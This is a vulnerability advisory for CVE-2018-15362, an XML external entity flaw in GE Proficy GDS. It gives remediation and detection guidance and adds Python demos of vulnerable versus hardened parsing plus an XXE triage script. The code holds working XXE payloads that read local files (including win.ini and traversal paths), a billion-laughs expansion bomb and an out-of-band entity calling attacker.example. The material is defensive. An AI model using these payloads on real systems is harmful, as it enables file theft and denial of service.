Full Report
An XXE injection vulnerability leads to path traversal inside the Proficy server. An attacker may be able to initiate an OPC UA session and retrieve an arbitrary file from the target system.
Analysis Summary
# Vulnerability: XML External Entity (XXE) in GE Proficy GDS
## CVE Details
- **CVE ID:** CVE-2018-15362
- **CVSS Score:** 8.2 (High)
- **CVSS Vector:** CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
- **CWE:** CWE-611 (Improper Restriction of XML External Entity Reference)
## Affected Systems
- **Products:** General Electric Proficy GDS (Global Discovery Server) used within Cimplicity environments.
- **Versions:**
- Cimplicity 9.0 R2
- Cimplicity 9.5
- Cimplicity 10.0
- **Configurations:** Systems running the Global Discovery Server (GDS) that listen for OPC UA sessions.
## Vulnerability Description
An XML External Entity (XXE) injection vulnerability (CWE-611) exists in the way the Proficy GDS processes XML input. The server's XML parser honours entity declarations in a DOCTYPE supplied with attacker-controlled XML, including external entities whose system identifier (`<!ENTITY x SYSTEM "...">`) names a file on the host. When the document references such an entity, the server resolves it in its own security context and the file's contents come back to the attacker; this is the path traversal the advisory describes. The advisory does not say which GDS message carries the XML, only that an attacker who can open an OPC UA session with the server can use it to retrieve arbitrary files readable by the GDS service account.
## Exploitation
- **Status:** No public proof-of-concept is linked from the advisory; the Kaspersky ICS CERT advisory and the NVD entry are the public record of the flaw.
- **Complexity:** Low
- **Attack Vector:** Network (Remote)
## Impact
- **Confidentiality:** Low (C:L in the vector), even though the advisory describes retrieval of arbitrary files; plan for exposure of anything readable by the GDS service account.
- **Integrity:** None (I:N).
- **Availability:** High (A:H). The advisory does not describe how availability is affected; the usual routes for a parser that honours DTDs are entity-expansion denial of service and a service that stalls while resolving an external entity that never returns.
## Remediation
### Patches
- GE recommends updating Proficy GDS to **Version 2.1** or newer.
- The patch can be accessed via the GE Digital support portal (Authentication required): hxxps://ge-ip[.]flexnetoperations[.]com/control/geip/download?element=10544807
### Workarounds
- The advisory gives no product-specific workaround. The generic XXE mitigation, disabling DTDs or at least external entity resolution in the XML parser, only applies to software whose parser you build or configure; for a closed vendor binary such as the GDS the operator cannot switch it on, so it is no substitute for the patch.
- Until the patch is applied, restrict network access to the GDS OPC UA endpoint to the hosts that genuinely need discovery (PR:N in the vector means an unauthenticated session is enough), and do not expose the endpoint across the OT/IT boundary.
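The flaw class from the Vulnerability Description and the "disable DTDs / external entities" mitigation above, side by side, as an added example written for this page rather than GE's or the Proficy GDS's own parser code. It uses only the Python standard library: xml.sax with its external-general-entities feature switched on stands in for a parser that resolves external entities the way the GDS did, and a plain expat parser that rejects any DOCTYPE stands in for the hardened configuration. The "secret" file and the payload are constructed here.

```python
"""Vulnerable vs. hardened XML parsing (added illustration of CWE-611).

Not GE's or the Proficy GDS parser: xml.sax with external general entities
enabled plays the vulnerable parser, expat with DOCTYPE rejected plays the
hardened one. The secret file and the XXE payload are constructed below."""
import io
import pathlib
import tempfile
import xml.sax
from xml.parsers import expat
from xml.sax import handler


def build_xxe_payload(file_url: str) -> bytes:
    """Classic XXE document: an external entity whose system identifier is a
    file URL, referenced from element content so its text is echoed back."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [ <!ENTITY xxe SYSTEM "{file_url}"> ]>\n'
        '<r>&xxe;</r>\n'
    ).encode()


class _TextCollector(handler.ContentHandler):
    """Collects character data, including text pulled in via entities."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_vulnerable(xml_bytes: bytes) -> str:
    """Parser that resolves external general entities: whatever the SYSTEM
    identifier points at is read in the parser's security context."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)  # the unsafe setting
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def parse_hardened(xml_bytes: bytes) -> str:
    """Parser that refuses DTDs outright, so no entity (internal or external)
    can be declared: the mitigation named in the Workarounds section."""
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError(f"DOCTYPE '{name}' rejected: DTDs are disabled")

    chunks = []
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject_doctype
    p.CharacterDataHandler = chunks.append
    p.Parse(xml_bytes, True)
    return "".join(chunks)


def demo() -> dict:
    """Plant a constructed 'secret' file, aim an XXE payload at it and report
    what each parser does with it."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("TOP-SECRET")          # constructed stand-in for a host file
        secret_path = pathlib.Path(f.name)
    try:
        payload = build_xxe_payload(secret_path.as_uri())
        result = {"leaked": parse_vulnerable(payload)}
        try:
            parse_hardened(payload)
            result["hardened_blocked"] = False
        except ValueError:
            result["hardened_blocked"] = True
    finally:
        secret_path.unlink()
    return result


if __name__ == "__main__":
    print(demo())
```

The vulnerable parser returns the file's contents as ordinary element text, which is exactly what an OPC UA client would receive back in a response that echoes the parsed document; the hardened parser never gets as far as declaring the entity.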
## Detection
- **Indicators of Compromise:** OPC UA session establishment (CreateSession/ActivateSession) from hosts that are not known GDS clients, and DOCTYPE or ENTITY declarations in XML destined for the GDS, in particular external entities whose system identifier is a `file:` URL or contains traversal sequences such as `../` or its URL-encoded form `%2e%2e%2f`.
- **Detection methods and tools:** Network IDS signatures for DTD constructs (`<!DOCTYPE`, `<!ENTITY ... SYSTEM`) in traffic to the GDS OPC UA port, with the caveat that an OPC UA secure channel in SignAndEncrypt mode encrypts the payload, so a passive sensor has nothing to match; in that case rely on GDS host logs and on file-access auditing for the GDS service account.
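A payload-triage routine for the indicators above, as an added example that is not from the advisory or any vendor tool; it assumes the defender can see the XML in clear. It goes slightly beyond the listed indicators: besides `file:` and traversal targets it flags parameter entities (the out-of-band XXE staple) and estimates nested entity expansion, the DTD feature behind the denial-of-service side of A:H. All sample payloads are constructed here, and `attacker.example` is a placeholder host.

```python
"""Triage XML payloads for the DTD features an XXE or entity-expansion attack
needs. Added example code, not from the advisory; samples are constructed."""
import re
from dataclasses import dataclass, field

SEVERITY_ORDER = ["none", "low", "medium", "high"]
MAX_EXPANSION = 10_000  # characters of expansion tolerated for one entity

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri">   or   <!ENTITY [%] name PUBLIC "id" "uri">
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?([\w.\-]+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"', re.I)
INTERNAL_ENTITY_RE = re.compile(r'<!ENTITY\s+([\w.\-]+)\s+"([^"]*)"', re.I)
ENTITY_REF_RE = re.compile(r"&([\w.\-]+);")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|%2e%2e(?:%2f|%5c|[/\\])", re.I)


@dataclass
class Verdict:
    severity: str = "none"
    findings: list = field(default_factory=list)

    def flag(self, finding: str, level: str) -> None:
        self.findings.append(finding)
        if SEVERITY_ORDER.index(level) > SEVERITY_ORDER.index(self.severity):
            self.severity = level


def _expansion_size(name, bodies, memo, stack):
    """Characters produced by fully expanding internal entity `name`."""
    if name in memo:
        return memo[name]
    if name in stack:                 # recursive entity: illegal XML, flag anyway
        return float("inf")
    body = bodies.get(name, "")
    stack.add(name)
    total = len(ENTITY_REF_RE.sub("", body))
    for ref in ENTITY_REF_RE.findall(body):
        total += _expansion_size(ref, bodies, memo, stack)
    stack.discard(name)
    memo[name] = total
    return total


def inspect_xml(payload: bytes) -> Verdict:
    """Classify one XML payload by the DTD features an attack would need."""
    text = payload.decode("utf-8", "replace")
    v = Verdict()
    if not DOCTYPE_RE.search(text):
        return v                      # no DTD, so nothing for XXE to declare
    v.flag("doctype", "low")
    for param, name, target in EXTERNAL_ENTITY_RE.findall(text):
        scheme = target.split(":", 1)[0].lower() if ":" in target else ""
        if param:
            v.flag(f"parameter-entity:{name}", "medium")   # blind/OOB XXE staple
        if scheme == "file" or TRAVERSAL_RE.search(target):
            v.flag(f"local-file-entity:{name}->{target}", "high")
        elif scheme in ("http", "https", "ftp"):
            v.flag(f"remote-entity:{name}->{target}", "high")
        else:
            v.flag(f"external-entity:{name}->{target}", "medium")
    bodies = dict(INTERNAL_ENTITY_RE.findall(text))
    memo = {}
    for name in bodies:
        size = _expansion_size(name, bodies, memo, set())
        if size > MAX_EXPANSION:
            v.flag(f"entity-expansion:{name}~{size}", "high")
    return v


def _billion_laughs(levels: int = 4, fanout: int = 10) -> bytes:
    """Constructed nested-expansion document: 3 * fanout**levels characters."""
    decls = ['<!ENTITY lol0 "lol">']
    for i in range(1, levels + 1):
        ref = f"&lol{i - 1};" * fanout
        decls.append(f'<!ENTITY lol{i} "{ref}">')
    return f'<!DOCTYPE a [{"".join(decls)}]><a>&lol{levels};</a>'.encode()


# Constructed sample payloads (not captured from a real GDS).
SAMPLES = {
    "benign": b'<?xml version="1.0"?><App><Name>Pump01</Name></App>',
    "internal-entity-only": b'<!DOCTYPE a [<!ENTITY vendor "GE">]><a>&vendor;</a>',
    "xxe-file": b'<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]><a>&xxe;</a>',
    "xxe-traversal": b'<!DOCTYPE a [<!ENTITY t SYSTEM "../../../secrets.txt">]><a>&t;</a>',
    "xxe-encoded-traversal": b'<!DOCTYPE a [<!ENTITY t SYSTEM "%2e%2e%2f%2e%2e%2fsecrets.txt">]><a>&t;</a>',
    "xxe-oob": b'<!DOCTYPE a [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]><a/>',
    "billion-laughs": _billion_laughs(),
}


def triage_samples() -> dict:
    """Severity per sample, the shape a SIEM enrichment step would emit."""
    return {name: inspect_xml(p).severity for name, p in SAMPLES.items()}


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        v = inspect_xml(payload)
        print(f"{name:24s} {v.severity:6s} {v.findings}")
```

A DOCTYPE on its own is only "low" because legitimate documents do carry internal entities; the verdict rises to "high" only when the DTD declares something the attack actually needs (a local or remote external entity, or an expansion chain past the threshold), which keeps the rule usable as a SIEM enrichment rather than a blanket alert.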
## References
- Kaspersky ICS CERT Advisory: hxxps://ics-cert[.]kaspersky[.]com/advisories/2018/12/07/klcert-18-025-general-electric-proficy-gds-xml-external-entity-xxe/
- NVD CVE-2018-15362: hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2018-15362